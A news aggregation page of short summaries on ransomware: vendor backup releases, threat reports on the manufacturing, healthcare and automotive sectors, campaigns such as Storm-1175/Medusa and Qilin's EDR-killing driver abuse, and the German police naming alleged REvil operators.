All news with #ransomware tag

🔒 NAKIVO has released Backup & Replication v11.2, introducing an automated real-time replication engine and expanded hypervisor support. The update delivers full compatibility with VMware vSphere 9 and Proxmox VE 9.0 (with 9.1 in scope), plus immutable backups, pre-recovery malware scanning, and air-gapped options to strengthen ransomware resilience. v11.2 also adopts OAuth 2.0 for email notifications and upgrades core platform components to improve stability and recovery speed.

🛡️ Researchers report the Payouts King ransomware is leveraging QEMU as a covert reverse SSH backdoor, running hidden Alpine Linux VMs to execute tools and bypass host security. Operators create a scheduled task named TPMProfiler to launch the VM as SYSTEM, use virtual disks disguised as benign files, and forward ports for remote access. The campaign—linked to STAC4713 and observed alongside a separate STAC3725 activity exploiting CitrixBleed 2—employs credential theft, robust obfuscation, and AES-256/RSA-4096 encryption. Sophos recommends hunting for unauthorized QEMU installs, suspicious SYSTEM tasks, and unusual SSH tunnels.

🔒 BleepingComputer will host a live webinar on May 14, 2026 at 2:00 PM ET that examines why managed service providers must align security and recovery strategies. Experts from Kaseya will explain how AI-driven phishing, BEC, and ransomware are evading traditional controls and how integrating backup and disaster recovery with detection reduces downtime. Attendees will receive practical guidance to strengthen MSP cyber resilience.

🔒 A new report from Halcyon warns that ransomware has become the fastest-growing and most disruptive cyber threat to the automotive sector, accounting for 44% of attacks on carmakers in 2025 after incidents more than doubled that year. The vendor links the surge to connected vehicle platforms, OTA update mechanisms, cloud services and insecure third-party suppliers. Recommended mitigations include patching edge devices, deploying phishing-resistant MFA, hardening EDR, maintaining immutable offline backups and enforcing supplier security requirements.

🚚 Modern trucks are "rolling networks" loaded with communications systems, sensors, cloud-connected devices and Wi-Fi, creating expansive attack surfaces. Ben Wilkens of NMFTA warns that cybercriminals exploit the sector’s uptime pressure with ransomware, extortion and cyber-enabled cargo theft. Core hygiene—MFA, network segmentation, social engineering training and timely patching—can significantly reduce risk but must be adapted for small carriers. NMFTA advances research, guidance and an annual conference to help the industry collaborate and strengthen defenses.

🔒 Cyberattacks on healthcare have surged since COVID-19, driven by telehealth adoption, cloud migration, and interconnected medical devices. Experts identify seven primary threats — ransomware, cloud misconfigurations, web application exploits, bad bots, phishing, insecure smart devices, and generative AI misuse — that target EHRs, PHI, and clinical availability. Under-resourced teams and extensive third-party dependencies amplify the operational and patient-safety impacts.

🔒 The global manufacturing sector entered 2025 confronting one of the most aggressive cyber threat environments in its history. Digital transformation, smart factories, and interconnected supply chains have expanded operational reach but introduced unprecedented attack surfaces, making ransomware and supply-chain compromises a primary concern. According to the Manufacturing Threat Landscape 2025 report, incidents rose sharply year over year, placing manufacturing at the center of global ransomware activity and forcing organizations to reassess defenses and incident readiness.

🔒 Modern manufacturing is increasingly targeted by fast, high-impact cyberattacks: Clorox production lines went dark in 2023 and a global automaker halted factories across five countries in 2025 from stolen credentials. Ransomware incidents against manufacturers rose 56% in 2025, with average European demands exceeding $1.16 million. The analysis highlights structural weaknesses—legacy OT, credential sprawl, and inadequate segmentation—and recommends pragmatic, non-disruptive defenses to protect operations without causing downtime.

🔒 Dutch healthcare software vendor ChipSoft has confirmed a ransomware incident that forced it to take its website and patient-facing digital services offline. The provider of the HiX EHR platform warned of "possible unauthorized access" and advised customers to disconnect affected systems while it investigates. The national healthcare CERT, Z-CERT, is coordinating response efforts with ChipSoft and impacted hospitals.

🔒 Talos analysts Amy Ciminnisi and Pierre Cadieux review the ransomware and vulnerability patterns that shaped 2025. They emphasize persistent campaigns against the manufacturing sector, increased targeting of management infrastructure, and the rise of stealthy living-off-the-land techniques that evade traditional controls. The hosts explain how to spot the difference between a system administrator and a threat actor and outline steps organizations can take to move beyond reactive defenses toward a more resilient, proactive security posture.

⚠️ Microsoft warns that Storm-1175 — an actor linked to Medusa ransomware — is rapidly exploiting internet-facing systems, often moving from initial access to data theft and encryption within 24 hours. The group has abused more than 16 vulnerabilities since 2023, including zero-days, and frequently chains exploits to establish persistence and accelerate operations. Targets include healthcare, education, professional services, and finance in Australia, the UK and the US.

⚠️ Microsoft says financially motivated actor Storm-1175 has run a high-tempo campaign that weaponizes both n-day and zero-day vulnerabilities to deliver Medusa ransomware against internet-facing systems. The group has exploited at least 16 flaws since 2023, including the zero-day CVE-2025-10035 affecting GoAnywhere MFT, and has impacted healthcare, education, professional services and finance in Australia, the UK and the US. Recommended protections include perimeter scanning, isolating web-facing systems behind VPNs, WAFs or a DMZ, enforcing MFA for RMM tools, enabling tamper protection and configuring XDR to detect and block common ransomware tactics.

🔒Storm-1175 conducts high-tempo ransomware campaigns that rapidly weaponize recently disclosed and, in some cases, pre-disclosure zero-day vulnerabilities to gain initial access to web-facing systems. After exploitation the actor moves quickly to establish persistence, perform credential theft, tamper with security controls, and exfiltrate data before deploying Medusa ransomware. Microsoft observed intrusions affecting healthcare, education, professional services, and finance across Australia, the United Kingdom, and the United States, often completing impact within days or less. Recommended defenses include perimeter asset discovery, robust patching, RMM hardening, and tamper protection for endpoint security.

🔒 Cisco Talos and Trend Micro say Qilin and Warlock ransomware groups have adopted a bring-your-own vulnerable driver (BYOVD) approach to disable endpoint security on compromised hosts. Talos identified a malicious DLL named msimg32.dll that side-loads a PE loader which decrypts and executes an in-memory EDR killer. The payload leverages renamed drivers such as rwdrv.sys (a repackaged ThrottleStop.sys) and hlpdrv.sys to access physical memory and terminate over 300 EDR drivers. Warlock has similarly used NSecKrnl.sys and a suite of legitimate tools to persist, move laterally, and exfiltrate data.

🕵️ Germany's Federal Criminal Police Office (BKA) has named the alleged primary operators of the REvil (aka Sodinokibi) ransomware ring as Daniil Maksimovich Shchukin and Anatoly Sergeevitsch Kravchuk. Shchukin, widely known by aliases including UNKN and Oneiilk2, is accused of acting as a group leader while Kravchuk is alleged to have served as a developer. The BKA links the two to 130 attacks in Germany, €1.9 million in paid ransoms across 25 cases, and total losses exceeding €35.4 million, situating the announcement within earlier international actions that disrupted REvil.

🔍 German authorities have identified 31‑year‑old Daniil Maksimovich Shchukin as the hacker known as 'UNKN', alleging he led the GandCrab and REvil ransomware operations. The Bundeskriminalamt says Shchukin and an associate extorted nearly €2 million in roughly two dozen attacks between 2019 and 2021, causing over €35 million in damage. Investigators cite cryptocurrency traces, forum links and a mugshot match; he is believed to be abroad, likely in Russia.

🔒 Ransomware's shift to multi-extortion is producing real operational harm across healthcare, finance, and manufacturing, with widespread incidents and patient-care disruptions reported in 2025–2026. Attackers now routinely exfiltrate data before encrypting systems, making backups alone insufficient and increasing regulatory and business risk. The article highlights D.AMO from Penta Security, an integrated platform combining kernel-level folder encryption, process-based access control, and independent recovery to render stolen files unreadable, block unauthorized access, and speed restoration.

🔒 Halcyon warns that the Akira ransomware group can complete a full attack lifecycle in under an hour, often exploiting vulnerabilities in internet-facing VPN and backup appliances where multi-factor authentication is absent. The group supplements exploits with credential theft, spearphishing, password spraying and initial access brokers, then exfiltrates data before encryption in a double-extortion model. Akira favors stealth and living-off-the-land tools (FileZilla, WinRAR, WinSCP, RClone) to stage and encrypt data; organizations should adopt layered defenses, harden third-party access, monitor for exfiltration and deploy dedicated anti-ransomware protections.

📰 The ThreatsDay Bulletin highlights immediate, actionable risks including a pre-auth RCE chain in Progress ShareFile (CVE-2026-2699/CVE-2026-2701), unpatched ImageMagick zero-days enabling RCE, and novel CloudTrail evasion techniques that erase forensic visibility. It also details widespread mobile-rootkit campaigns, a sharp rise in open-source and supply-chain malware advisories, and phishing apps abusing distribution services to harvest credentials. Defenders should prioritize patching, sandboxing ingest pipelines, and hunting for signs of chained low-and-slow techniques and suspicious AWS API activity.

🔍 This Talos analysis dissects a malicious msimg32.dll used in Qilin ransomware attacks, detailing a multi-stage PE loader that evades and disables endpoint detection and response (EDR) solutions. The loader employs SEH/VEH obfuscation, syscall-stub reuse, and paging-file-backed sections to decrypt and map payloads entirely in memory without triggering hooks or ETW telemetry. The final EDR killer loads two helper drivers to perform physical memory R/W and to unprotect and terminate guarded processes, enabling it to neutralize over 300 vendor drivers.